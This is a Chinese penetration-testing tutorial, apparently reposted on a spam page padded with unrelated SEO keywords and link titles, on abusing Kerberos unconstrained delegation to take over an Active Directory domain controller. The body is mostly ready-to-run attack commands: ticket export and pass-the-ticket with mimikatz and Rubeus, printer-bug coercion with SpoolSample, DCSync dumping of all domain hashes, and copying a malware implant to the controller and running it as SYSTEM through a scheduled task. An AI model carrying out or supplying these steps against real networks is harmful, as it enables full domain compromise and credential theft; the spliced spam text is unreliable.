当前位置: 首页 > news >正文

南沙手机网站建设北京工商登记

南沙手机网站建设,北京工商登记,谷歌网站收录入口,怎样在手机做自己的网站系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内网渗透(五)之基础知识-Active Directory活动目录介绍和使用 内网渗透(六)之基…系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内网渗透(五)之基础知识-Active Directory活动目录介绍和使用 内网渗透(六)之基础知识-域中的权限划分和基本思想 内网渗透(七)之基础知识-企业常见安全域划分和结构 内网渗透(八)之基础知识-企业域中计算机分类和专业名 系列文章第二章节之内网信息收集篇 内网渗透(九)之内网信息收集-手动本地信息收集 内网渗透(十)之内网信息收集-编写自动化脚本收集本地信息 内网渗透(十一)之内网信息收集-内网IP扫描和发现 内网渗透(十二)之内网信息收集-内网端口扫描和发现 内网渗透(十三)之内网信息收集-收集域环境中的基本信息 内网渗透(十四)之内网信息收集-域环境中查找域内用户基本信息 内网渗透(十五)之内网信息收集-域环境中定位域管理员 内网渗透(十六)之内网信息收集-powershell基础知识 内网渗透(十七)之内网信息收集-powershell收集域内信息和敏感数据定位 系列文章第三章节之Windows协议认证和密码抓取篇 内网渗透(十八)之Windows协议认证和密码抓取-本地认证(NTML哈希和LM哈希 内网渗透(十九)之Windows协议认证和密码抓取-网络认证(基于挑战响应认证的NTLM协议) 内网渗透(二十)之Windows协议认证和密码抓取-域认证(Kerberos协议) 内网渗透(二十一)之Windows协议认证和密码抓取-Golden Ticket黄金票据制作原理及利用方式 内网渗透(二十二)之Windows协议认证和密码抓取-Silver Ticket白银票据制作原理及利用方式 内网渗透(二十三)之Windows协议认证和密码抓取-Mimikatz介绍和各种模块使用方法 内网渗透(二十四)之Windows协议认证和密码抓取-Mimikatz读取sam和lsass获取密码 内网渗透(二十五)之Windows协议认证和密码抓取-使用Hashcat和在线工具破解NTLM Hash 内网渗透(二十六)之Windows协议认证和密码抓取-浏览器、数据库等其他密码的抓取 内网渗透(二十七)之Windows协议认证和密码抓取-Windows其他类型抓取NTLM HASH工具 内网渗透(二十八)之Windows协议认证和密码抓取-Windows RDP凭证的抓取和密码破解 内网渗透(二十九)之Windows协议认证和密码抓取-Windows-2012R2之后抓取密码的方式和抓取密码的防范措施 系列文章第四章节之横向移动篇 内网渗透(三十)之横向移动篇-利用远控工具向日葵横向移动 内网渗透(三十一)之横向移动篇-利用远控工具todesk横向移动 内网渗透(三十二)之横向移动篇-利用远控工具GoToHTTP横向移动 内网渗透(三十三)之横向移动篇-利用远控工具RustDESK横向移动 内网渗透(三十四)之横向移动篇-IPC配合计划任务横向移动 内网渗透(三十五)之横向移动篇-IPC配合系统服务横向移动 内网渗透(三十六)之横向移动篇-Password Spraying密码喷洒攻击和域内用户枚举横向移动 内网渗透(三十七)之横向移动篇-Pass the Hash 哈希传递攻击(PTH)横向移动 内网渗透(三十八)之横向移动篇-pass the key 密钥传递攻击(PTK)横向攻击 内网渗透(三十九)之横向移动篇-pass the ticket 票据传递攻击(PTT)横向攻击 内网渗透(四十)之横向移动篇-ms14-068传递获取域管横向移动 内网渗透(四十一)之横向移动篇-PsExec工具远程命令执行横向移动 内网渗透(四十二)之横向移动篇-WMIC远程执行命令横向移动 内网渗透(四十三)之横向移动篇-SMB远程执行命令横向移动 内网渗透(四十四)之横向移动篇-DCOM远程执行命令横向移动 内网渗透(四十五)之横向移动篇-WinRM远程执行命令横向移动 内网渗透(四十六)之横向移动篇-使用系统漏洞ms17010横向移动 系列文章第五章节之域控安全和跨域攻击篇 内网渗透(四十七)之域控安全和跨域攻击-多种方式提取和移动ntds.dit文件 内网渗透(四十八)之域控安全和跨域攻击-多种方式在线读取ntds.dit文件中的hash值 内网渗透(四十九)之域控安全和跨域攻击-多种方式离线读取ntds.dit文件中的hash值 内网渗透(五十)之域控安全和跨域攻击-使用其他工具导出域账号和散列值 内网渗透(五十一)之域控安全和跨域攻击-跨域攻击介绍 内网渗透(五十二)之域控安全和跨域攻击-搭建和查看域信任关系 内网渗透(五十三)之域控安全和跨域攻击-利用域信任密钥获取目标域控 内网渗透(五十四)之域控安全和跨域攻击-利用krbtgt哈希值获取目标域控 内网渗透(五十五)之域控安全和跨域攻击-委派攻击的概述 注阅读本编文章前请先阅读系列文章以免造成看不懂的情况 非约束委派攻击 非约束委派使用场景 从使用的角度用户张三访问一台机器A于是向DC发起认证DC会检查A的机器账号的属性如果是非约束委派的话会把用户的TGT放在ST票据中并一起发送给A,这样A在验证ST票据的同时也获取到了用户的TGT并把TGT储存在自己的lsass进程中以备下次重用从而A就可以使用这个TGT来模拟这个张三访问任何服务。 从攻击角度来说如果攻击者拿到了一台配置了非约束委派的机器权限可以诱导管理员来访问该机器然后可以得到管理员的TGT从而模拟管理员访问任意服务相当于拿下了整个域环境或者结合打印机漏洞让域管用户强制回连以缓存 TGT 一个域内用户访问WEB服务但是一些资源在文件服务上这个时候就需要委派需要web系统代表用户A去访问文件服务的资源 非约束委派的漏洞 如果是域管访问web系统我们就可以通过web系统伪造域管的身份登录域控 利用非约束委派域控主动访问控制域控 实验环境如下 机器位置机器IP机器名机器登录用户所属域委派配置域内域控制器192.168.41.10DChack\administratorhack.com域控域内机器192.168.41.14WIN-10hack\jackhack.com配置了非约束性委派 实验前提控制了域内的一台机器WIN-10并且该机器的服务账号配置了非约束委派如下 1、使用Adfind查询域内非约束委派机器账号,上传Adfind到目标机器上 AdFind.exe -b DChack,DCcom -f ((samAccountType805306369) (userAccountControl:1.2.840.113556.1.4.803:524288)) cn distinguishedName2、我们先去访问域控是不能访问的 dir \\dc.hack.com\c$3、这个时候如果域管访问了WIN-10机器,我们的内存中就会有域管的TGT就可以访问任意机器了在域控上执行访问WIN-10(模仿域管访问了配置了非约束性委派的主机) net use \\WIN-10.HACK.COM /user:hack\administrator 1234564、去WIN-10中导出内存中的票据,这里由于导出票据需要高权限所以在这一步我们需要进行提权 sekurlsa::tickets /export5、进行票据传递就可以获取域控的权限了 mimikatz kerberos::ptt [0;54acdf]-2-0-60a10000-AdministratorkrbtgtHACK.COM.kirbi6、访问域控 shell dir \\dc.hack.com\c$7、复制恶意程序上线域控 copy artifact.exe \\dc.hack.com\c$8、创建计划任务 shell schtasks /create /s dc.hack.com /tn test /sc onstart /tr c:\artifact.exe /ru system /f9、执行计划任务 shell schtasks /run /s dc.hack.com /i /tn test10、域控上线 利用非约束委派域控被动访问控制域控 实验环境如下 机器位置机器IP机器名机器登录用户所属域委派配置域内域控制器192.168.41.10DChack\administratorhack.com域控域内机器192.168.41.14WIN-10hack\jackhack.com配置了非约束性委派 实验前提控制了域内的一台机器WIN-10并且该机器的服务账号配置了非约束委派如下 一般域管不会主动访问我们我们可以利用 Windows 打印系统远程协议MS-RPRN中的一种旧的但是默认启用的方法在该方法中域用户可以使用 MS-RPRN RpcRemoteFindFirstPrinterChangeNotification(Ex) 方法强制任何运行了 Spooler 服务的计算机以通过 Kerberos 或 NTLM 对攻击者选择的目标进行身份验证。非约束性委派主机结合 Spooler 打印机服务漏洞让域控机器 DC 强制访问已控的具有本地管理员权限的非约束性委派机器 WIN-10 从而拿到域管理员的 TGT进而接管域控。2008机器可能复现不了因为版本的问题 进行实验之前一定要把所有的防火墙关闭所有的防火墙关闭所有的防火墙关闭 1、首先利用Rubeus在 WIN-10 上以本地管理员权限执行以下命令每隔一秒监听来自域控机器 DC 的登录信息 Rubeus.exe monitor /interval:1 /filteruser: DC$再利用SpoolSample强制域控打印机回连需在域用户进程上执行所以这里切换成了普通域用户帐号去执行 SpoolSample.exe DC WIN-10Rubeus监听到票据 Rubeus导入票据 Rubeus.exe ptt /ticket:票据获取域内用户的hash lsadump::dcsync /all /csv如果当前的用户是管理员就可以使用PTH攻击如果是普通的域用户就使用黄金票据 或者使用计划任务上线 copy artifact.exe \\dc.hack.com\c$shell schtasks /create /s dc.hack.com /tn test /sc onstart /tr c:\artifact.exe /ru system /fshell schtasks /run /s dc.hack.com /i /tn test等待域控上线
http://www.dnsts.com.cn/news/181365.html

相关文章:

  • 河北网站建设与推广亚马逊雨林动物大全
  • 网站建设网站软件有哪些内容阿里巴巴网站开发工具
  • 那些网站是用python做的内蒙古网站建设电话
  • 五金技术支持东莞网站建设济南网站建设抖音平台
  • html网站制作教程WordPress即时群聊
  • 汕头站扩建工程WordPress密码如何修改
  • 泉州住房和城乡建设局网站wordpress教程网视频
  • 城市生活网官方网站appwordpress单页淘客源码
  • 网站做文献格式建设部特殊工种查询网站
  • 珠海响应式网站建设价格人社部能力建设中心网站
  • 网站建设管理报告有谁知道网站优化怎么做
  • 网站建设费用计入管理费用的哪个科目渭南建设用地规划查询网站
  • 网站建设vr网站名称大全
  • 公司网站建设方案书怎么写作文生成器
  • 网站线上推广方式邢台做网站信息
  • 中企动力网站案例wordpress 短地址
  • 卖彩票的网站怎么做的wordpress专用主机
  • 如何给网站做在线培训系统
  • 网站建设研究背景宁波建站公司哪家服务好
  • 制作个人网站怎么做做湲兔费网站视颍
  • 邯郸网站制作建设班组安全建设 网站
  • 网页设计和网站建设实战大全网站变成了百度推广
  • 网站开发的就业方向网站的数据库怎么建立
  • 免费网站建站凡科建站做搜狗网站排名软件
  • 网站建设类的公司名怎么起国内有名的软件开发公司排名
  • 网站备案号没有-1aso关键字优化
  • 建立企业网站的形式有wordpress如何匹配模板
  • 网站信息内容建设实施办法厦门响应式网站建设
  • 除了dz论坛还能搭建什么网站企业做网站公司排名
  • 宁波住房与城乡建设部网站58招聘运营网站怎么做